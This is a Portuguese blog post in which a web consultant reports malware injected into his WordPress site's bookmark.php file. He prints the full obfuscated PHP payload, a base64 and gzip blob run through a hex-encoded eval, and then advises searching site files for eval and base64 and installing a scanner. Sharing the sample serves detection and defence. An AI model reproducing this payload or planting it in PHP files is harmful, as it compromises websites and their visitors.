(41) 9225-6319
contato@felipemarques.com.br

Malware no WordPress

Resumo

Recentemente tive problemas em um dos meus sites que utilizam wordpress. O codigo abaixo foi injetado maliciosamente por algum virus/malware que consegui encontrar alguma falha no wordpress ou algum plugin que eu utilizo no meu site.
Vou postar aqui o codigo que eu encontrei no arquivo /wp-includes/bookmark.php:

<?php $njjybh = array("eNqtWQlz4kbT/iv","EtbU2XxyvRgegeL","UvPsDGa/BrDBjYb","FGAxCmOQmI5Nvvf","v57umZE4vEkqbxJ","LYqbnmb67Z5IY9h","Jnv/SW0244nE1b3","noYhMHZaaFwmkwm","vifkRKJQOHs3TH5","/13auFov25uz0NH","FxWnm1U+3XNf8MG","i8Z7XF0xb/7n+/4","q/StU+fva/4Y8Id","75/PXsHNX5e90Ic","dfrPJSrfb519ONu","XriH5vrevvVGvPP","juFuCzmrWrhtLIs","3Y+f0HLfu6vyZn/","Bnkz9qNn+GHb3sA","0nHuMatOvzh20P+","atRL+KuJ3PkbIGv","f88+yhoi3s2+PK/","7l4Cbnp4VNZgSvx","5UciH6I1/NraYQc","kKCI88gf1fWgM3F","Z49XFvVA4FB2V4X","eQIca6KOyq33w10","/hd4Q9thRij6uqW","v5/5YyYFf9ZR0GV","nUhu5dwr9W2c06z","/r62+Rcqqlm772G","ZbdPs/gExm+Qfso","If/LvxDkYVO4yfw","qZEQ5CKqh57X2K/","+yl3XQEExX7pADF","LzBHyh8mT/mqHPd","5K9UgT+vHNwMuXD","oheJIhuC/h2HRKA","0boyIqIIfu9IDKK","lpPL7jD6KnSnRS2","/BNdBmnQmnxd5Yr","F1uB8sYJ0sCaiL9","40kOcSKrnv7ItSJ","xGA/ZTQNQ7UHl6Q","MVbgK0qjZvdxVND","QmrXV8nXbCNG6Nd","Yp3qDirHqNv9CVl","vzxur0Kn2ragi/n","v7cPaOvHUU6r31i","dIuJrG1RjLVgpJ6","r4Li1l3UdfjMMYf","38m/yttyxIKPamE","HMEShNIWHJ5E1yy","01EsgzUGOW+uSq9","U6xaHG6mI5CYTLV","RBxCFjuKCHKoIcm","LUcPDMhrUbm++xl","NgnAYl3H5cWdX7J","yzFNM1VN8CGd3ZG","fVzIAC6wwNwUVyh","GomMLPASvqUy9I/","tAKYF0xX8IBK2kg","ZTTNcRVqiRP6SRS","RfktAUNjXdjguNJ","lTbJMn6gnEFuBZx","IIdBQFdQKCJIzij","5x8FSRhi1sSoJxV","FtuU+e73F5zL2TF","fORlxVHOVGrJczQ","dNIvTxVFhy5ch2f","ZZ8U3p2iIRTXibG","1KPL70K1xcpcks7","diusS0ygVxorshm","iod3QW/hX3GOuBe","p4DTthWD4JORC9J","rQw5rzqXBMk8vNG","eDrwYyF/jE896xK","FpB9LnYIilLQlzK","C4lMHY9umKdFlBa","j5kFf0oWmnDgtCK","uVH65GxWVxz16VY","pxxKKKVL0mbiCGy","9Pvo/GRQYGUnJLu","UyDb74uja6F1A9C","r8jAirtGtNFGugU","YUhNSb4rbq8gqTe","ktW+kSxUoXdwBFK","cWoDXImipJfcTKO","KJ0sskKR6xB3Ajs","vnyrPNO12VXoCF4","g2y60pAlARlItQ+","hx6+a3yyS2PdhSF","+DOKVzHnKgslNLj","2tyWhx2KlSKEtkX","wZLxplqngQVLek1","zGhSkRQjPScWqA/","VgYq6F+3OUyxSi6","VN0QmQyZUxKJGOO","wI3WRb5JBEGs9Wp","A7MbFgGZQIkD5Nx","F/nv021NxZz0H1U","7EAphCeJKhqwIIm","GzyH8w+XLOxO7xF","ExqwmHOgVlS6Dyq","iibZUYQxJTyV7Mh","5dEwUkCTQSyKzW1","AMxU7IbORzGB/xZ","QaPvNdtX5SaiHyk","arwuUupeSipKtVk","kW1/KFgt/XE4pSe","6IiWRNu6rGhS8TS","6LdInImtKxJrUXx","o8tYl8w9UpjpsUo","EWsMSc8gUom6ipd","Qx1g+0GFdJTB50N","rlsGy3r7yh+lNtT","QdVQzZrQIDlYQ7Y","Lb2uvqmoEtoLKbt","puakG18IiQVUe5e","FT3i1EDUhZhXBBB","1N2S9lSpV6VDhXG","DJy6TmJBeLUJX1P","Od0BVJbQ8iZgRLl","vqiz7oy+o/UadVs","RC6gSv5TRRgkzoH","o3/aSB8+4qnWFnF","66HUSh6+81I7F+Z","XRloDEqeREFz7wW","mcX+TmGmKfIWLJ+","VKub50m0jUkNTOE","6B8Uxcov6D51Jy5","3ivgUlupXJ81DGY","qpmoFKicoqUhE7l","d0YpSg5yPl9bnFZ","HK3IfkshGmuimrH","IafhuT8c2xJXUfT","TVkDWLEWpUvuc/F","orYjKvLO8HKthxY","3wdDBjUeZ3Ktw+V","pinnfSIcIZqXyo5","RzFZ2AifWseqjiT","VFEd90YA8W7HMKX","qBQcyEQrF4UF5ho","QTtlFTHvetm5C/R","2RVNM9ZkEJcq18L","quXWJOwbGz5gsfW","XupQWziH2BXB5r6","EREjmTjDR0QJ93K","elxYlZ4VE7xX4CR","xy1L5xp5vW+pHYQ","HF73HUZ7tOUdCKu","yI98d6atxCyL0Dp","ccc1iYkdEcWjK/1","jVWIx/8AlRdH87R","8aAlrO+e5aKvtF5","4ijsVnpa6rbHFGz","J082uGNNHYRkBQY","5FHNP8RCpiBRNWV","ClaMEYOa9qHYA52","TJE9R6SqIP3GmUl","V/dKKRFjRrfxYN/","U1/yipKuvWXcqTu","q0R4fuSZaNic1DU","L6Mh4GrrzgR7mpc","42G/eVfbyCsZPHH","bQ2yDjGcndr/SvV","NZL2i/1pYuNX0NA","xWx6US3BN27AU8T","bSxN1tjDM8Q1nqH","ar3jC39Bh/YHUc3","7q6vameX+9oXsYS","NSAqw8G3cn6m3uP","l0EuatU1ukbZ71L","8Ia/3vtZWFyB0qy","JEcesPQefOHyJDm","ADiPPIZ1wBU+Lz3","lx4J496784ZeC5r","1gtphopJg2JisqU","wQAx7WsPwS9GfiY","owpvzNBvbkTf+PW","MR91XvOBq+c3aDs","6b7iqQtPtkkvm41","M93Ky2bdYhPsf5a","fPV0uq3c7qIwz2K","/XrFzrSf4xdd6GR","+OHisz68fa2hX19","tWg16052OUu9Dnh","ib/rOXYM75qaNvq","lSLgM+Wc/6Iuzm5","iiu/vb96981dNId","wqPtEh22DsdpB/z","FrVcY1uctDxy/m6","ls+V86j3l3y5Ws3","btapWe6ljAOTvy1","WMoypfqZVeXmrXV","ZXzNFVMHiq52hPq","pcrIbpJ3KTT6mKW","RNjFeHjeWRjFzRc","zHJYNJ6jjQmVFDs","+bzTkp7uVMyoau/","srHMK5gqr+gALk6","tt+JnhAHldFWMzI","8/xaG0glpeFSObi","HQlKaSm5T2LPkDL","ezemyhWvzYlqlic","qSrR9Z9Ab/F6wM6","nxRFGuPbyIyzKxQ","yNyo5vI9AVirHNn","L4VlZXxRvF73KDh","rg2YkIES239Cx++","y5BpDcqfJMZHnkM","OioEMmPT5OXCy9c","LqaJTjvwUmbL9bo","z1zt71/7ybvg1ef","kj8SMx7B25BO8Ov","O64tZq3Bl7bbfmz","tnuaTH5XV+KH02f","J78eBursLu2fvfL","+lJb/zF3MKhTMte","QkrDxcuF35rOB2G","fD0n1h01dJa8xO/","AC2fzEBH1c6Zpmn","5O6EemTf18MVtOX","djv6GpDTv/KLPjv","OJFtx+i0C4v/Jd9","ghmWQGYbi/XKWBc","ZbfS88A5FZMvnnn","/EBPQn/fM8e4lh6","bDt9/w+2/nFkUSo","TyfIr7HXJhw1Sn7","f2yAS6YLvrzwJPj","gCnSJv4xXESvbYf","eMnvwoFw/PLHDw8","GE8cM1gtm3fFs7k","25wfr+rNP2cZGJ2","2tOEC5aC2/ut7se","F9lInsPTTEqLAeR","84fVbk3bYHXACK3","l+gnMnwgEsB38Ku","Ky3nvvcl4E0pVBo","Dp9fpLm/XtLqOAN","IwRlI01KLrISfiT","//TNAHKAFIMmp/+","GGDyvmPlAOmG8yC","sLOZticCEOa4er7","/hEABMU0gpR2lOS","RKKeOZ/D/ij3zJj","uzKvRgE8toTbvtW","OJx4syU5QFpR6eC","hsb+kMnBaxJ/mnN","zlKkLa+0rlvx/Yh","fbH4o/pySXNJy6c","k3sQ4nekOZgqez1","v4S1+TwzCcP77hw","9IhGh7lFyPjCVjS","6uBt/jtqu9NBTY7","tgJcsjdfgneRXDS","ZvFwNhr4HycabSX","GEPIwv7IHig31Na","GYGHzxkepHPpwVL","bMefmEFaZywCEGH","EdIdmYu4llGoKJn","QH/db82FkkPnyi5","x9TmjohmwPNXjgw","E+MBEg/tHAVjtJX","KOF/FTsYeLxDsX2","MuCPMcMgUiSyxDK","opWGnFqMaYj9W4s","srQIRpBA6Ho3Alk","m4vtIDCJjR1bZfy","NwzX1V6RqqSme7W","zKTS6uLX4erpE3N","czKWrIyqJAldxPI","dY5DwaNTrDmbcJX","VYCBkv5BNHC57rh","dc7JY8PkPItYiAl","bJB22vj/kzmqRSK","l6JWmV4ZeNr4Mkt","pg9NLpRVnUIOcxC","MUgFINQDEIxCMUk","FJNQTEIxRS4mFJN","QTEIxCcUkFJNQLE","KxCMUiFItQLEKxC","MUiFItQLEKxCCVF","KClCSRFKilBShJI","ilBShpAglRSgpQk","kTSppQ0oSSJpQ0o","aQJJU0oaUJJE0qa","UDKEkiGUDKFkCCV","DKBlCyRBKhlAyhJ","IhFJtQbEKxCcUmF","JtQbEKxCcUmFDsj","s0sm8gmbMKGTEG8","m3rp4G+ItModmiX","dKvNPinRFvgccEH","hN4TOAxgSczERN4","TOAxgccEHhN4Ihy","ZLvB0gacLPF3g6Z","YU0nIwu8Szn/B8p","ot6DJsTre2Ei6V3","2ZtBqYNcRIGTaAc","Yn7A1xCBUoP7w7I","QGTmSMiSCzHWxjL","juwfhzlQTu5g5hR","iCxCpN+SnVhH9FP","gRHvq/kIAKFBGCb","S3cHdJAtKVLzoAo","P3oyMxpXKTUP+mf","/TrAjycy+/KNdLW","YtBa9Vg/q6U7Sio","ZJDbrowQ2Hj014u","yEnZJ3STYf3MO5w","IWeS36lQIz+8paQ","JywGVuYrO5K2vxL","CAjCq/nXz/PrE7B","ikQxoZBjC+u1e5g","MnPFz6hBMlPyD9x","uOfWH07FcArrADi","DGwuWPcLYU3qDTK","UI3xCv5lu6CTcAb","+FboTeYtANvR4P7","kWSQktobe9Bu1Gt","CgJ2Om0lOXx+n0v","0lnHNAJIs4JtKJn","rVa+8JhrtTDgoHT","Q+QtUKgUjehAmrr","aUKpggjOpo+bB0N","OF2x3XlrXe0461p","uWhE9Qx2KoZow4H","RcCMJUG9H8Dw8WW","ajAw31hxBwlwJyN","BtOSSfigMDnsJwf","QwwGnk/nI3XizDj","ZaFTy8xOETQA6Rq","5mnVYQthf8pJqlY","bVcIgMJ94/ubAq2","g+VACUMQQHAk89r","Ts59sNG8HQThYLA","+2khP/YrMsxNfCC","2bLhTgm6baTnavT","CWgZNZrGE2vcdhn","Vl2dVYw5RLImgM8","/2eOCLidhRhqcAO","MjOY0dRO8bQofiL","WbdFJ83374/zKyk","kz1RVoz7aiP3z85","9J51NC1WQm2igGf","VSSfMrQ9hRh0on/","kG2UHlk+nAKFnap","8GVOgoX352fn/6x","vq3Vn2D2T9emAVd","d4/wjQ/Z/0bef4J","Y7uCqhPeX+nnUB7","yjT1XkylsEE78YO","51h22/O2gvRCrkW","QOPbQYjC4szhgFn","wdZLrlzLlb/guCG","OLGxv3BTjhrE3Yc","kJPK6EM3+28qgms","egyRhf3ELyUiasJ","pobScsgw1FhGFYD","p0vcxow6DwAvP3r","Vunp4+F3JfSBipV","MNysoflSl2IQFaW","ZPHUD1Yh3lMOzSY","ucHc7fguyN2nRRQ","84xF65MWTDBh1Gd","rfF4EUhOxnLYg2U","tG0aCDHET2j4w+K","ETtD8xivbWy2GoQ","CglGXpOB5ZHnLYZ","TZqHozo4gXa0Iu0","dfTFMahViG271y5","ko17CsH42mdqfPN","BNtEnynxjBwqblx","/9A1ccVZDGW/Ddy","UjRBXXLbIR0ALFP","eU9rxUXlmMDVHqo","KI6KbIZGo4BL/dm","aKLGsP+LZYgrL2H","yNRHFC7hTP0EIoz","EyCQ+UYTBqVY0pz","D2UYylk0cIM0cI7","SOEKe2QMMXwUniv","FUejQPt0spgkflv","0EoLf/zuhW55De/","NS9Za9D2KJFmC8p","P4iXoDsH8XLG54g","Wg4eru1OJOP798d","EYfzenI8Gw60nhz","7GLrvpX1mRTSM6T","jNxs8DE1QITdwss","lZI+Zjq06MsCDmS","yWUhGUiaTXxMXkk","Q5VdraexylMvf/5","O0W5F5xAwVlQl0l","qjMPnOvAMfb+7w1","S7J9I/7Z5GYmdOU","yTdG9pnfzc7rFLU","cviN8v8+Vd2jk2a","7MAJsMmI1yxMEGb","Kye5KTh6x08kKJx","AmTJMOpOPTYEaci","ONHflNdIkDB4ieM","bLgYUpMOA6BZKr3","CjzJ0CyHO+j/EOT","sbXe2dC3JlwExCW","ichAhvO+TDEcUQm","Pxp09htWMfQ/pkf","sIq8lWVpLJi7Ela","fXpv/LxO/EJmEr7","s2/Qgnmf8nYzfjB","H4RP4uLkY9BdDOd","hItzMPec09Nbhh1","H7W5tGTz+RgT5+o","N+f+N09VJx4m5Qm","dbzZe2TbrttqY+N","I7IoA5bd2B2zHwh","DiZ+8PGL5M/OfT/","wMqkxHY");eval("\x65\x76\x61\x6C\x28\x67\x7A\x75\x6E\x63\x6F\x6D\x70\x72\x65\x73\x73\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28\x69\x6D\x70\x6C\x6F\x64\x65\x28\x22\x22\x2C\x24\x6E\x6A\x6A\x79\x62\x68\x29\x29\x29\x29\x3B");?>

Dica para soluçao do problema

O interessante nesses casos, eh fazer download completo do seu site para a sua maquina local, e efetuar uma pesquisa sobre os seguintes termos: iframe, eval, base64_encode, base64_decode.
Se a pesquisa retornar algum resultado, verificar se o codigo encontrado se trata de alguma coisa que voce desconheça, caso positivo, remova o codigo e em seguida, instale o plugin Sucuri Scanner, disponivel no diretorio de plugins do wordpress oficial.

Espero ter ajudado alguem, ate a proxima pessoal.

Sobre o autor
Felipe Marques é Consultor e Analista de Sistemas Web e Mobile. Mais de 10 anos de experiência.
  1. Marcus MJM Reply

    Felipe Marques!

    Meu banner foi desativado, estou com banners novos, atualiza ele por aew. Valeu. http://www.buenosarro.com

Faça um comentário

*

Facebook Auto Publish Powered By : XYZScripts.com